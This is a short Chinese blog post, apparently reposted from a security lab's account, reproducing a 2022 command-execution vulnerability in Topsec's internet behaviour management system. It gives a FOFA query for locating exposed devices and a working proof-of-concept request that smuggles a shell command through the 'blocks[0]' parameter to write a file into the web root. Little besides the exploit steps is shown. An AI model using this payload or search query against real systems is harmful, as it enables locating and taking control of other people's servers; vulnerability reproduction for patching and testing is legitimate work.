2022HVV 天融信上网行为管理RCE

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 2022HVV 天融信上网行为管理RCE

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

图片[1]-2022HVV 天融信上网行为管理RCE-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofa:app=”天融信-上网行为管理系统”

1.执行poc

/view/IPV6/naborTable/static_convert.php?blocks[0]=||  echo '123' >> /var/www/html/1.txt%0A
图片[2]-2022HVV 天融信上网行为管理RCE-渗透云记 - 专注于网络安全与技术分享

2.访问1.txt,得到写入的内容

/1.txt
图片[3]-2022HVV 天融信上网行为管理RCE-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容